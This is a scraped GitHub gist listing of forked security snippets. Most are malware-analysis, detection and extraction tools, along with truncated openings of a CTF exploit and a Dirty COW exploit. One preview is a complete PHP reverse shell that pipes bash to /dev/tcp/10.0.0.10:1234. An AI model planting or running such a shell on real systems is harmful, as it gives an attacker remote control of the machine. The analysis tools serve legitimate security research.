Skip to content

Instantly share code, notes, and snippets.

View reanimat0r's full-sized avatar

Bart Black reanimat0r

19 followers · 50 following
View GitHub Profile
@reanimat0r
reanimat0r / dotnet-runtime-etw.py
Created October 24, 2018 19:54 — forked from countercept/dotnet-runtime-etw.py
A research aid for tracing security relevant events in the CLR via ETW for detecting malicious assemblies.
import time
import etw
import etw.evntrace
import sys
import argparse
import threading
class RundownDotNetETW(etw.ETW):
def __init__(self, verbose, high_risk_only):
@reanimat0r
reanimat0r / Get-LibraryMS.ps1
Created October 24, 2018 19:55 — forked from countercept/Get-LibraryMS.ps1
Checks the %USERPROFILE% directory for any file with library-ms extension and extract the CLSID. In particular, the <url> element with shell command.
function Get-LibraryMS {
<#
.SYNOPSIS
Author: Jayden Zheng (@fuseyjz)
Checks the %USERPROFILE% directory for any file with library-ms extension and extract the CLSID.
In particular, <url> element with shell command.
Blog: pending release
@reanimat0r
reanimat0r / Onions.md
Created October 24, 2018 21:14 — forked from maestron/Onions.md
Onion Links last Updated 09/02/2018
@reanimat0r
reanimat0r / http_proxy_connect.py
Created October 24, 2018 21:15 — forked from frxstrem/http_proxy_connect.py
Establish a socket connection through an HTTP proxy in Python.
'''
Establish a socket connection through an HTTP proxy.
Author: Fredrik Østrem <[email protected]>
License:
This code can be used, modified and distributed freely, as long as it is this note containing the original
author, the source and this license, is put along with the source code.
'''
@reanimat0r
reanimat0r / shell.php
Created October 27, 2018 22:46 — forked from rshipp/shell.php
A tiny PHP/bash reverse shell.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
@reanimat0r
reanimat0r / exp300.py
Created October 28, 2018 21:08 — forked from mak/exp300.py
Exploit for 300 at 34c3ctf
import phun
class R(phun.Remote):
def menu(self):
self.read('4) free\n')
def cmd(self,nr,idx):
self.menu()
self.sendline(str(nr))
@reanimat0r
reanimat0r / wcr.py
Created October 28, 2018 21:09 — forked from mak/wcr.py
Extract everything from WannaCry
import re
import os,sys
import pefile
import struct
import zipfile
import hashlib
import StringIO
from Crypto import Random
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5,AES
@reanimat0r
reanimat0r / hdoc.py
Created October 28, 2018 21:09 — forked from mak/hdoc.py
Extract payload from H-docs
#!/usr/bin/env python2
import os
import re
import sys
import math
import pefile
import struct
import hashlib
import argparse
from oletools import olevba
@reanimat0r
reanimat0r / x.sh
Created October 28, 2018 21:10 — forked from mak/x.sh
one-liner to extract powershell command in recent nymaim's documnets
( olevba $document | grep ' = ' | \
sed -e's/&/+/g' -e's/NaN/None/g' -e's/ = [^A].*(\(A.*)\))/= \1/' -e 's/Array//' \
-e's/(/[/g' -e's/)/]/g' -e "s#\"\([^\"]*\)\"\([^\"]*\)\"#\"\1'\2#" | \
grep '\[\|\+'; \
echo 'print globals()[sorted(globals(),key=lambda x: type(globals()[x]) == str and len(globals()[x]))[-1]]'
) \
| python2 - | tr -d '^' | tr '[:upper:]' '[:lower:]'
@reanimat0r
reanimat0r / naughtyc0w.c
Created October 28, 2018 21:10 — forked from mak/naughtyc0w.c
exploit for CVE-2016-5195 nothing fancy
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <sys/uio.h>
#include <sys/wait.h>